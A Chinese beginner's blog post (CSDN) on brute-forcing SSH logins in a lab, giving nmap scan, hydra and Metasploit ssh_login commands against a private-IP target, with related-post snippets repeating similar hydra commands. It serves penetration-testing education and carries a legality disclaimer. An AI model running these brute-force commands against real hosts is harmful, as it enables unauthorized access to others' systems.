ssh渗透与hydra爆破(简明不啰嗦)

最新推荐文章于 2024-05-17 11:30:00 发布
最新推荐文章于 2024-05-17 11:30:00 发布
阅读量2.7k 收藏 29
点赞数 1
分类专栏: 渗透 文章标签: 安全 web安全 网络攻击模型 系统安全 模块测试 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yi152787/article/details/128668729
版权

适合新手上路,MSF与hydra两种方式渗透22端口,后进行远程连接,如有不足请各位见谅

此次实验仅供参考,切勿做违法犯罪,出事一切与本人无关后果自负,希望大家早日成为白帽子。

渗透机:kali

靶机:192.168.75.128

1.扫描局域网寻找22端口(开放)

nmap 192.168.75.1/24

2.已知192.168.75.128的22端口处于开放状态,22端口可以用hydra或msf爆破

第一种: hydra -L user.txt -P pass.txt -1 -vV -ens 192.168.75.128 ssh (比较慢且命令参数多)

Hydra -L user.txt -P pass.txt -V 192.168.75.128 ssh

第二个种MSF:

3.进入msfconsole

Search ssh_login 显示渗透指令

4.Use 0 设置第一种

5.查看配置信息

6.set rhosts 192.168.75.128 设置目标ip

8.set user_file user.txt 设置用户字典

9.set pass_file pass.txt 设置密码字典

10.exploit或run 开始爆破

爆破结果: 用户名root 密码:ban

11.ssh 192.168.75.128 输入用户名密码

实验结束

由于时间原因,大家可以直接采用hydra进行弱口令爆破,另外需自己准备好爆破字典,日后都会更新网安相关知识,感兴趣的伙伴点个关注,如有不足之处请见谅,本人也是刚写博客不久。

柒氏
关注
  • 1
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
ssh弱口令暴力破解
weixin_45253622的博客
03-28 2361
ssh弱口令暴力破解 ssh安全外壳协议) SSH 为 Secure Shell 的缩写,由 IETF 的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。SSH最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。SSH在正确使用时可弥补网络中的漏洞SSH客户端适用于多种平台。几乎所有UNIX平台—包括HP-UX、L
Hydra密码爆破工具使用教程图文教程(超详细)
wangyuxiang946的博客
12-06 2万+
Hydra也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。
Hydra 爆破ssh
qq_43757105的博客
10-23 3161
目录 Centos7开启ssh服务 在Kali中生成一个4位数的密码字典 用Hydra爆破靶机centos7的密码 Centos7开启ssh服务 SSH配置看博客 查看ssh服务开启状态:systemctl status sshd.service 开启ssh服务:systemctl start sshd.service 检查一下22端口是否开启:netstat -an | grep 22 在Kali中生成一个4位数的密码字典 用Hydra爆破靶机c...
应用协议安全Hydra 端口爆破工具.(九头蛇)
最新发布
m0_59598029的博客
05-17 1113
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
如何利用SSH爆破
vivlol918的博客
05-21 1296
SSH可以通过加密连接来远程登录到其他计算机系统,可以通过控制台(终端)、图形化的桌面环境等方式进行操作。
hydra ssh协议爆破
秦子腾
10-20 3067
┌──(root????kali)-[~] └─# hydra -L user.tx -P passwd.txt 10.10.14.50 ssh # -l 指定用户 # -p 指定密码 # -L 指定用户词典 # -P 指定密码词典 10.10.14.50: 爆破的IP地址 ssh: 基于22端口协议爆破 其他协议还有(mysql sft rdp) ...
ssh爆破工具hydra.zip
04-27
ssh爆破工具hydra.zip
hydra密码爆破字典压缩后120M,password压缩前386M。
03-03
hydra密码爆破字典压缩后120M,压缩前386M。下的别人的,共享出来
hydra强大的爆破工具,支持多种协议
05-05
hydra支持POP3,SMB,RDP、SSH,FTP,POP3,Telnet,MYSQL等协议的爆破
hydra 爆破工具
02-22
windows 版 hydra 爆破工具,仅供学习。
密码爆破DOS运行_hydra-7.3-windows.7z
02-13
暴力猜解即是穷举法,穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证...若全部情况验证后都不符合题目的全部条件,则本题无解。穷举法也称为枚举法
ssh暴力破解主机密码
08-09
ssh暴力破解windows服务器密码,绝对详细的教程,立即可以使用
【经验分享】Hydra(爆破神器)使用方法
weixin_33730836的博客
11-08 3736
这个也是backtrack下面很受欢迎的一个工具 参数详解:-R 根据上一次进度继续破解-S 使用SSL协议连接-s 指定端口-l 指定用户名-L 指定用户名字典(文件)-p 指定密码破解-P 指定密码字典(文件)-e 空密码探测和指定用户密码探测(ns)-C 用户名可以用:分割(username:password)可以代替-l username -p password-o 输出文件-t 指定多...
Linux下的暴力密码在线破解工具Hydra
专注于性能调优、安全、自动化
07-01 3928
这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破解,其密码能否被破解关键在于字典是否足够强大。对于社会工程型渗透来说,有时能够得到事半功倍的效果。本文仅从安全角度去探讨测试,使用本文内容去做破坏者,与本人无关。 一、简介 hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。官网:http://www.thc.org/thc-hydra,可支持AF
使用msf爆破ssh
weixin_45291045的博客
05-15 1304
启动msf msfconsole 选择模块 search ssh_longin 进入模块 use auxiliary/scanner/ssh/ssh_login 查看配置 show options 设置目标ip set RHOSTS 192.168.182.133 设置密码字典所在的路径文件 set pass_file 1.txt 设置用户名字典所在路径文件 set user_file 2.txt 查看是否设置成功 show options 启动爆破 run 爆破成功 连接 ssh
两款SSH爆破工具的介绍:hydra+medusa
William234的博客
03-20 9482
两款SSH爆破工具的介绍:hydra+me...
Kali系列之hydra ssh密码爆破
weixin_34242819的博客
04-12 1695
环境 kali 192.168.137.131 靶机 192.168.137.133 语句 hydra -l root -P /home/chenglee/zidian/wordlist.TXT -t 6 ssh://192.168.137.133 状态 root@kali:/home/chenglee# hydra -l root -P /home/cheng...
python爆破端口_ssh爆破(python腳本)
weixin_30080745的博客
02-21 438
最近在烏雲看到一份端口詳解:為了鍛煉自己,按照端口詳解寫腳本 #!/usr/local/bin/ python# -*- coding: UTF-8 -*-__author__ = 'yangxiaodi'from multiprocessing import Poolfrom pexpect import pxsshimport sysreload(sys)sys.setdefaultencod...
九头蛇 Hydra 在线密码破解(ftp,ssh,各种)
热门推荐
dzp443366的专栏
09-21 3万+
-R 继续从上一次进度接着破解 -S 采用SSL链接 -s PORT 如果非默认端口,可通过这个参数指定 -l LOGIN 小写,用于指定破解的用户,对特定用户破解 -L FILE 大写,用于指定用户的用户名字典 -p PASS 小写,用于指定密码破解,少用,一般是采用密码字典 -P FILE 大写,用于指定密码字典 -e ns 额外的选项,n:空密码试探
hydra爆破ssh
01-19
使用hydra进行SSH爆破的方法如下: 1. 使用用户名和密码字典进行爆破: ```shell hydra -l <用户名> -P <密码字典路径> ssh://<目标IP地址> ``` 例如: ```shell hydra -l root -P /home/saijie/桌面/password.txt ssh://172.16.xx.xx ``` 这将使用用户名"root"和密码字典"/home/saijie/桌面/password.txt"对IP地址为"172.16.xx.xx"的SSH进行爆破。 2. 使用用户名字典和密码字典进行爆破: ```shell hydra -L <用户名字典路径> -P <密码字典路径> ssh://<目标IP地址> ``` 例如: ```shell hydra -L users.txt -P password.txt ssh://192.168.130.133 ``` 这将使用用户名字典"users.txt"和密码字典"password.txt"对IP地址为"192.168.130.133"的SSH进行爆破。 请注意,使用hydra进行SSH爆破是一种潜在的非法行为,只能在合法授权的情况下使用。确保你有合法的权限和授权才能进行此操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值